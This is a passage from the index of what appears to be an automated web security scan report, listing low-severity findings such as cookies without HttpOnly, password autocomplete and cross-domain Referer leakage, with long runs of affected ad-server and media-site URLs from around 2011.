12.164. http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx
12.165. http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction
12.166. http://www.wtp101.com/admeld_sync
12.167. http://www.wtp101.com/cox_sync
12.168. http://www22.glam.com/cTagsImgCmd.act
13. Cookie without HttpOnly flag set
13.1. http://ads.adxpose.com/ads/ads.js
13.2. http://dg.specificclick.net/
13.3. http://event.adxpose.com/event.flow
13.4. http://fansided.com/category/nba
13.5. http://idolator.com/favicon.ico
13.7. http://kotaku.com/index.php
13.8. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information
13.9. http://www.nba.com/mavericks/index_main.html
13.10. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif
13.11. http://www.ugo.com/takeover/takeover.html
13.12. http://www.ugo.com/takeover/takeover.js
13.13. http://a.tribalfusion.com/i.cid
13.14. http://a.tribalfusion.com/j.ad
13.16. http://ad.amgdgt.com/ads/
13.19. http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13
13.20. http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23
13.21. http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2
13.22. http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137
13.23. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
13.24. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
13.25. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
13.26. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
13.27. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
13.28. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
13.29. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
13.30. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7
13.31. http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34
13.32. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10
13.33. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11
13.34. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7
13.35. http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4
13.36. http://ad.doubleclick.net/adj/buz.idolator/content
13.37. http://ad.doubleclick.net/adj/cm.mtv/ent_010111
13.38. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
13.39. http://ad.doubleclick.net/adj/oiq.rmx/
13.40. http://ad.doubleclick.net/click
13.41. http://ad.turn.com/server/ads.js
13.42. http://ad.turn.com/server/pixel.htm
13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**
13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**
13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**
13.46. http://ad.yieldmanager.com/iframe3
13.47. http://ad.yieldmanager.com/imp
13.48. http://ad.yieldmanager.com/imp
13.49. http://ad.yieldmanager.com/pixel
13.50. http://ad.yieldmanager.com/unpixel
13.51. http://admeld.lucidmedia.com/clicksense/admeld/match
13.52. http://adopt.imiclk.com/emb/q
13.53. http://ads.ad4game.com/www/delivery/ajs.php
13.54. http://ads.adbrite.com/adserver/vdi/742697
13.55. http://ads.cpxadroit.com/adserver/10-1TZ6SMYM9UGQB.cpxad
13.56. http://ads.gamershell.com/delivery/al.php
13.57. http://ads.gamershell.com/www/delivery/ajs.php
13.68. http://ads.revsci.net/adserver/ako
13.69. http://ads.undertone.com/f
13.70. http://ak1.abmr.net/is/adopt.imiclk.com
13.71. http://ak1.abmr.net/is/tag.admeld.com
13.72. http://ak1.abmr.net/is/www.burstnet.com
13.73. http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1
13.74. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11
13.75. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php
13.76. http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php
13.77. http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php
13.78. http://api.bizographics.com/v1/profile.redirect
13.79. http://api.twitter.com/1/FanSided/lists//statuses.json
13.80. http://apr.lijit.com///www/delivery/ajs.php
13.81. http://ar.voicefive.com/b/recruitBeacon.pli
13.82. http://ar.voicefive.com/b/recruitBeacon.pli
13.83. http://ar.voicefive.com/b/wc_beacon.pli
13.84. http://ar.voicefive.com/bmx3/broker.pli
13.85. http://at.amgdgt.com/ads/
13.86. http://b.scorecardresearch.com/b
13.87. http://b.scorecardresearch.com/p
13.88. http://b.scorecardresearch.com/r
13.89. http://b.voicefive.com/b
13.90. http://b.voicefive.com/p
13.91. http://beacon.dmsinsights.com/beacon/1103771/2
13.92. http://bh.contextweb.com/bh/rtset
13.93. http://bpx.a9.com/ads/getad
13.94. http://bs.serving-sys.com/BurstingPipe/adServer.bs
13.95. http://bs.serving-sys.com/BurstingPipe/adServer.bs
13.96. http://btg.mtvnservices.com/aria/guid.html
13.97. http://ce.lijit.com/merge
13.98. http://cm.npc-lee.overture.com/js_1_0/
13.99. http://csc.beap.ad.yieldmanager.net/i
13.100. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM
13.101. http://d.adroll.com/view/7e0e346171a4d3507190678e09366eb4
13.102. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830
13.103. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830
13.104. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
13.105. http://d.chango.com/collector/admeldpixel
13.106. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830
13.107. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830
13.109. http://d.xp1.ru4.com/meta
13.110. http://d.xp1.ru4.com/meta
13.111. http://d1.openx.org/lg.php
13.112. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js
13.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js
13.114. http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js
13.115. http://d7.zedo.com/img/bh.gif
13.116. http://gdyn.nba.com/1.1/1.gif
13.117. http://glam.grapeshot.co.uk/main/redirect.cgi
13.118. http://image2.pubmatic.com/AdServer/Pug
13.119. http://img137.imageshack.us/img137/4291/d5zee1.jpg
13.120. http://img690.imageshack.us/img690/7868/umadbroz.jpg
13.121. http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png
13.122. http://imp.constantcontact.com/imp/cmp.jsp
13.123. http://js.revsci.net/gateway/gw.js
13.124. http://load.exelator.com/load/
13.125. http://m.xp1.ru4.com/meta
13.126. http://media.fastclick.net/w/tre
13.127. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif
13.128. http://my.yahoo.com/e/df
13.129. http://my.yahoo.com/e/js
13.133. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js
13.134. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js
13.135. http://ox-d.sbnation.com/w/1.0/ajs
13.136. http://p.brilig.com/contact/bct
13.137. http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js
13.138. http://pix04.revsci.net/D10889/a1/0/3/0.gif
13.139. http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js
13.140. http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js
13.141. http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js
13.142. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif
13.143. http://pix04.revsci.net/G07610/b3/0/3/noscript.gif
13.144. http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js
13.145. http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js
13.146. http://pixel.invitemedia.com/data_sync
13.147. http://pixel.quantserve.com/pixel
13.148. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
13.149. http://pixel.rubiconproject.com/di.php
13.150. http://pixel.rubiconproject.com/tap.php
13.151. http://r.openx.net/set
13.152. http://r.turn.com/r/bd
13.153. http://r.turn.com/r/beacon
13.154. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/
13.155. http://rs.gwallet.com/r1/pixel/x420r9190030
13.156. http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583
13.157. http://segments.adap.tv/data/
13.158. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221
13.159. http://server.cpmstar.com/brilig.aspx
13.160. http://services.krxd.net/geoip
13.161. http://services.krxd.net/pixel.gif
13.162. http://showadsak.pubmatic.com/AdServer/AdServerServlet
13.163. http://sis.amazon.com/iu
13.164. http://srv.clickfuse.com/pixels/delete.php
13.165. http://stgapi.choicestream.com/instr/csanywhere.js
13.166. http://sync.adap.tv/sync
13.167. http://sync.mathtag.com/sync
13.168. http://syndication.mmismm.com/tntwo.php
13.169. http://t.invitemedia.com/track_imp
13.170. http://tag.admeld.com/ad/js/195/fsv/728x90/ros
13.171. http://tags.bluekai.com/site/2312
13.172. http://tags.bluekai.com/site/2731
13.173. http://tags.bluekai.com/site/2736
13.174. http://tags.bluekai.com/site/3113
13.175. http://tags.bluekai.com/site/353
13.176. http://tap.rubiconproject.com/oz/feeds/targus/profile
13.177. http://tap.rubiconproject.com/oz/sensor
13.178. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js
13.179. http://tiger.vizu.com/a.gif
13.180. http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530
13.182. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp
13.183. http://u.openx.net/w/1.0/sc
13.184. http://vap3den1.lijit.com/www/delivery/lg.php
13.185. http://viacom.adbureau.net/LSERVER/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90
13.186. http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90
13.187. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979
13.188. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058
13.189. http://vt.imiclk.com/cgi/vtc.cgi
13.190. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/
13.191. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp
13.192. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx
13.193. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp
13.194. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
13.195. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp
13.198. http://www.expedia.com/hotel.h892034.Hotel-Information
13.199. http://www.googleadservices.com/pagead/aclk
13.200. http://www.imdb.com/title/tt0944947/
13.201. http://www.lijit.com/beacon
13.202. http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx
13.203. http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction
13.204. http://www.wtp101.com/admeld_sync
13.205. http://www.wtp101.com/cox_sync
13.206. http://www22.glam.com/cTagsImgCmd.act
14. Password field with autocomplete enabled
14.1. https://login.yahoo.com/config/login_verify2
14.3. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
14.4. http://www.mavsmoneyball.com/fanposts
14.5. http://www.mavsmoneyball.com/mavericks-tickets
14.6. http://www.nba.com/mavericks/index_main.html
14.7. http://www.nba.com/mavericks/index_main.html
15.1. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif
15.2. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif
15.3. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png
15.4. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png
16. Referer-dependent response
16.1. http://ad.yieldmanager.com/imp
16.2. http://adnxs.revsci.net/imp
16.3. http://ads.adbrite.com/adserver/vdi/742697
16.4. http://api.twitter.com/1/FanSided/lists//statuses.json
16.5. http://tag.admeld.com/ad/js/195/fsv/728x90/ros
16.6. http://www.apture.com/js/apture.js
16.7. http://www.expedia.com/hotel.h892034.Hotel-Information
16.8. http://www.facebook.com/extern/login_status.php
16.9. http://www.facebook.com/plugins/activity.php
16.10. http://www.facebook.com/plugins/like.php
16.11. http://www.facebook.com/plugins/likebox.php
16.12. http://www.facebook.com/widgets/like.php
17.1. http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
17.2. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
17.5. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
17.6. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
17.7. http://www.mavsmoneyball.com/fanposts
17.8. http://www.mavsmoneyball.com/fanposts
17.9. http://www.mavsmoneyball.com/mavericks-tickets
17.10. http://www.mavsmoneyball.com/mavericks-tickets
17.11. http://www.nba.com/mavericks/index_main.html
17.12. http://www.nba.com/mavericks/index_main.html
18. Cross-domain Referer leakage
18.1. http://ad.amgdgt.com/ads/
18.2. http://ad.amgdgt.com/ads/
18.3. http://ad.amgdgt.com/ads/
18.4. http://ad.amgdgt.com/ads/
18.5. http://ad.amgdgt.com/ads/
18.6. http://ad.amgdgt.com/ads/
18.7. http://ad.amgdgt.com/ads/
18.8. http://ad.amgdgt.com/ads/
18.9. http://ad.amgdgt.com/ads/
18.10. http://ad.amgdgt.com/ads/
18.11. http://ad.amgdgt.com/ads/
18.12. http://ad.amgdgt.com/ads/
18.13. http://ad.amgdgt.com/ads/
18.14. http://ad.amgdgt.com/ads/
18.15. http://ad.amgdgt.com/ads/
18.16. http://ad.amgdgt.com/ads/
18.17. http://ad.amgdgt.com/ads/
18.18. http://ad.amgdgt.com/ads/
18.19. http://ad.doubleclick.net/adi/N1558.NetMining/B5527925
18.20. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
18.21. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
18.22. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
18.23. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
18.24. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
18.25. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
18.26. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
18.27. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
18.28. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
18.29. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
18.30. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
18.31. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7
18.32. http://ad.doubleclick.net/adi/amzn.us.audienceextension/
18.33. http://ad.doubleclick.net/adi/x1.dt/dt2
18.34. http://ad.doubleclick.net/adi/x1.dt/dt2
18.35. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
18.36. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
18.37. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
18.38. http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.2
18.39. http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.3
18.40. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11
18.41. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in
18.42. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in
18.43. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in
18.44. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in
18.45. http://ad.doubleclick.net/adj/fansided.fsv/ros
18.46. http://ad.doubleclick.net/adj/gm.kotaku/e3
18.47. http://ad.doubleclick.net/adj/gm.kotaku/pax
18.48. http://ad.doubleclick.net/adj/gm.kotaku/threeDS
18.49. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails
18.50. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails
18.51. http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_left_728x90
18.52. http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_right_200x90
18.53. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/hcb/favicon
18.54. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
18.55. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/hcb/favicon
18.56. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
18.57. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
18.58. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
18.59. http://ad.doubleclick.net/adj/team_sites.dart/global_nav
18.60. http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index
18.61. http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index
18.62. http://ad.turn.com/server/ads.js
18.63. http://ad.turn.com/server/ads.js
18.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**
18.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**
18.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**
18.70. http://ad.yieldmanager.com/iframe3
18.71. http://ad.yieldmanager.com/iframe3
18.72. http://ad.yieldmanager.com/iframe3
18.73. http://ad.yieldmanager.com/pixel
18.74. http://ad.yieldmanager.com/v0/admeld-match
18.75. http://adadvisor.net/adscores/g.js
18.76. http://admeld-match.dotomi.com/admeld/match
18.77. http://admeld.adnxs.com/usersync
18.78. http://admeld.lucidmedia.com/clicksense/admeld/match
18.79. http://admin.brightcove.com/js/BrightcoveExperiences.js
18.80. http://adopt.imiclk.com/emb/q
18.81. http://adopt.imiclk.com/emb/q
18.82. http://ads.bluelithium.com/st
18.83. http://ads.tw.adsonar.com/adserving/getAds.jsp
18.84. http://adserv.impactengine.com/www/7u/8t/1p/2b/objembed.html
18.85. http://adserv.impactengine.com/www/8i/8j/9q/km/objembed.html
18.86. http://adserv.impactengine.com/www/j8/4t/w4/uf/objembed.html/@@1305142019@@
18.87. http://adserv.impactengine.com/www/l3/df/ey/qw/objembed.html/@@1302711674@@
18.88. http://adserver.veruta.com/cookiematch.fcgi
18.89. http://api.twitter.com/1/FanSided/lists//statuses.json
18.90. http://apps.conduit-banners.com/Twackle-Twackle_Sports
18.91. http://as.jivox.com/player/iabplayer.php
18.92. http://as.jivox.com/player/iabplayer.php
18.93. http://as.jivox.com/player/jivox_ad_tags.php
18.94. http://as.jivox.com/player/jivox_ad_tags.php
18.95. http://bidnw.ru4.com/nf
18.96. http://bidnw.ru4.com/nf
18.97. http://bn.xp1.ru4.com/nf
18.98. http://bp.specificclick.net/
18.99. http://bpx.a9.com/ads/getad
18.100. http://bpx.a9.com/ads/render
18.101. http://cdn.extensions.buzznet.com/topscript.js.php
18.102. http://cim.meebo.com/cim
18.103. http://cm.g.doubleclick.net/pixel
18.104. http://cm.g.doubleclick.net/pixel
18.105. http://cm.g.doubleclick.net/pixel
18.106. http://cm.g.doubleclick.net/pixel
18.107. http://cm.npc-lee.overture.com/js_1_0/
18.108. http://cms.ad.yieldmanager.net/v1/cms
18.109. http://creativeby1.unicast.com/assets/A322/N26843/M13937/P1944/Q72996/script_850_40.js
18.110. http://dg.specificclick.net/
18.111. http://fls.doubleclick.net/activityi
18.112. http://fls.doubleclick.net/activityi
18.113. http://fls.doubleclick.net/activityi
18.114. http://googleads.g.doubleclick.net/pagead/ads
18.115. http://googleads.g.doubleclick.net/pagead/ads
18.116. http://googleads.g.doubleclick.net/pagead/ads
18.117. http://googleads.g.doubleclick.net/pagead/ads
18.118. http://googleads.g.doubleclick.net/pagead/ads
18.119. http://googleads.g.doubleclick.net/pagead/ads
18.120. http://googleads.g.doubleclick.net/pagead/ads
18.121. http://googleads.g.doubleclick.net/pagead/ads
18.122. http://googleads.g.doubleclick.net/pagead/ads
18.123. http://googleads.g.doubleclick.net/pagead/ads
18.124. http://googleads.g.doubleclick.net/pagead/ads
18.125. http://googleads.g.doubleclick.net/pagead/ads
18.126. http://googleads.g.doubleclick.net/pagead/ads
18.127. http://googleads.g.doubleclick.net/pagead/ads
18.128. http://googleads.g.doubleclick.net/pagead/ads
18.129. http://googleads.g.doubleclick.net/pagead/ads
18.130. http://googleads.g.doubleclick.net/pagead/ads
18.131. http://googleads.g.doubleclick.net/pagead/ads
18.132. http://googleads.g.doubleclick.net/pagead/ads
18.133. http://googleads.g.doubleclick.net/pagead/ads
18.134. http://googleads.g.doubleclick.net/pagead/ads
18.135. http://googleads.g.doubleclick.net/pagead/ads
18.136. http://googleads.g.doubleclick.net/pagead/ads
18.137. http://googleads.g.doubleclick.net/pagead/ads
18.138. http://googleads.g.doubleclick.net/pagead/ads
18.139. http://googleads.g.doubleclick.net/pagead/ads
18.140. http://googleads.g.doubleclick.net/pagead/ads
18.141. http://googleads.g.doubleclick.net/pagead/ads
18.142. http://googleads.g.doubleclick.net/pagead/ads
18.143. http://googleads.g.doubleclick.net/pagead/ads
18.144. http://googleads.g.doubleclick.net/pagead/ads
18.145. http://googleads.g.doubleclick.net/pagead/ads
18.146. http://googleads.g.doubleclick.net/pagead/ads
18.147. http://googleads.g.doubleclick.net/pagead/ads
18.148. http://googleads.g.doubleclick.net/pagead/ads
18.149. http://googleads.g.doubleclick.net/pagead/ads
18.150. http://googleads.g.doubleclick.net/pagead/ads
18.151. http://googleads.g.doubleclick.net/pagead/ads
18.152. http://googleads.g.doubleclick.net/pagead/ads
18.153. http://googleads.g.doubleclick.net/pagead/ads
18.154. http://googleads.g.doubleclick.net/pagead/ads
18.155. http://googleads.g.doubleclick.net/pagead/ads
18.156. http://googleads.g.doubleclick.net/pagead/ads
18.157. http://googleads.g.doubleclick.net/pagead/ads
18.158. http://googleads.g.doubleclick.net/pagead/ads
18.159. http://googleads.g.doubleclick.net/pagead/ads
18.160. http://googleads.g.doubleclick.net/pagead/ads
18.161. http://googleads.g.doubleclick.net/pagead/ads
18.162. http://googleads.g.doubleclick.net/pagead/ads
18.163. http://googleads.g.doubleclick.net/pagead/ads
18.164. http://googleads.g.doubleclick.net/pagead/ads
18.165. http://googleads.g.doubleclick.net/pagead/ads
18.166. http://googleads.g.doubleclick.net/pagead/ads
18.167. http://googleads.g.doubleclick.net/pagead/ads
18.168. http://ib.adnxs.com/ab
18.169. http://ib.adnxs.com/ab
18.170. http://ib.adnxs.com/ab
18.171. http://ib.adnxs.com/ptj
18.173. http://img.timeinc.net/time/rd/trunk/www/web/feds/j/articles.js
18.174. http://k.collective-media.net/cmadj/cm.mtv/ent_010111
18.175. http://kotaku.com/static/ad_iframe.php
18.176. http://kotaku.com/static/ad_iframe.php
18.179. http://l.yimg.com/zz/combo
18.180. http://load.exelator.com/load/
18.181. https://login.yahoo.com/config/login_verify2
18.182. http://mediacdn.disqus.com/1307735099/build/system/disqus.js
18.183. http://my.yahoo.com/darla/fc.php
18.184. http://my.yahoo.com/darla/fc.php
18.185. http://my.yahoo.com/darla/fc.php
18.186. http://my.yahoo.com/darla/fc.php
18.187. http://my.yahoo.com/darla/fc.php
18.188. http://my.yahoo.com/darla/fc.php
18.189. http://my.yahoo.com/darla/fc.php
18.190. http://my.yahoo.com/darla/fc.php
18.191. http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros
18.192. http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros
18.196. http://open.ad.yieldmanager.net/a1
18.197. http://open.ad.yieldmanager.net/a1
18.198. http://pagead2.googlesyndication.com/pagead/ads
18.199. http://pagead2.googlesyndication.com/pagead/ads
18.200. http://pixel.invitemedia.com/admeld_sync
18.201. http://pixel.invitemedia.com/admeld_sync
18.202. http://platform0.twitter.com/widgets/follow_button.html
18.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet
18.204. http://sports.yahoo.com/nba/expertsarchive
18.205. http://sports.yahoo.com/nba/news
18.206. http://sports.yahoo.com/nba/news
18.207. http://sports.yahoo.com/nba/news
18.208. http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js
18.209. http://um.simpli.fi/am_js.js
18.210. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information
18.211. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
18.212. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp
18.213. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js
18.214. http://www.facebook.com/plugins/activity.php
18.215. http://www.facebook.com/plugins/comments.php
18.216. http://www.facebook.com/plugins/like.php
18.217. http://www.facebook.com/plugins/likebox.php
18.218. http://www.facebook.com/plugins/likebox.php
18.219. http://www.facebook.com/plugins/likebox.php
18.220. http://www.facebook.com/plugins/likebox.php
18.221. http://www.facebook.com/plugins/likebox.php
18.222. http://www.facebook.com/plugins/likebox.php
18.223. http://www.facebook.com/plugins/recommendations.php
18.224. http://www.facebook.com/widgets/like.php
18.225. http://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg
18.226. http://www.google.com/trends/hottrends
18.227. http://www.google.com/trends/hottrends
18.228. http://www.google.com/trends/hottrends
18.229. http://www.google.com/trends/hottrends
18.230. http://www.nba.com/video/cvp/teamarticleplayer.html
18.231. http://www.paperg.com/jsfb/embed.php
18.232. http://www.stumbleupon.com/badge/embed/5/
18.233. http://www.ugo.com/cm/ugo/js/ugo-global.js
18.234. http://www2.glam.com/app/site/affiliate/viewChannelModule.act
19. Cross-domain script include
19.1. http://ad.amgdgt.com/ads/
19.2. http://ad.amgdgt.com/ads/
19.3. http://ad.amgdgt.com/ads/
19.4. http://ad.amgdgt.com/ads/
19.5. http://ad.amgdgt.com/ads/
19.6. http://ad.amgdgt.com/ads/
19.7. http://ad.amgdgt.com/ads/
19.8. http://ad.amgdgt.com/ads/
19.9. http://ad.amgdgt.com/ads/
19.10. http://ad.amgdgt.com/ads/
19.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
19.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
19.13. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
19.14. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
19.15. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
19.16. http://ad.doubleclick.net/adi/x1.dt/dt2
19.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
19.18. http://ad.doubleclick.net/adj/fansided.fsv/ros
19.19. http://adopt.imiclk.com/emb/q
19.20. http://adopt.imiclk.com/emb/q
19.21. http://bidnw.ru4.com/nf
19.22. http://bidnw.ru4.com/nf
19.23. http://bn.xp1.ru4.com/nf
19.24. http://cdn.triggertag.gorillanation.com/js/triggertag.js
19.25. http://fansided.com/category/nba/
19.26. http://fls.doubleclick.net/activityi
19.27. http://g-ecx.images-amazon.com/images/G/01/pda/pda.js
19.28. http://googleads.g.doubleclick.net/pagead/ads
19.29. http://googleads.g.doubleclick.net/pagead/ads
19.30. http://googleads.g.doubleclick.net/pagead/ads
19.31. http://googleads.g.doubleclick.net/pagead/ads
19.32. http://googleads.g.doubleclick.net/pagead/ads
19.33. http://googleads.g.doubleclick.net/pagead/ads
19.34. http://googleads.g.doubleclick.net/pagead/ads
19.35. http://googleads.g.doubleclick.net/pagead/ads
19.36. http://googleads.g.doubleclick.net/pagead/ads
19.37. http://googleads.g.doubleclick.net/pagead/ads
19.38. http://googleads.g.doubleclick.net/pagead/ads
19.39. http://googleads.g.doubleclick.net/pagead/ads
19.40. http://googleads.g.doubleclick.net/pagead/ads
19.41. http://googleads.g.doubleclick.net/pagead/ads
19.42. http://googleads.g.doubleclick.net/pagead/ads
19.43. http://googleads.g.doubleclick.net/pagead/ads
19.44. http://googleads.g.doubleclick.net/pagead/ads
19.45. http://googleads.g.doubleclick.net/pagead/ads
19.46. http://googleads.g.doubleclick.net/pagead/ads
19.48. http://idolator.com/ifb/audience-science.html
19.49. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php
19.50. http://kotaku.com/static/ad_iframe.php
19.51. http://kotaku.com/static/ad_iframe.php
19.52. http://kotaku.com/static/items/kotaku.com/trackers.html
19.53. https://login.yahoo.com/config/login_verify2
19.54. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif
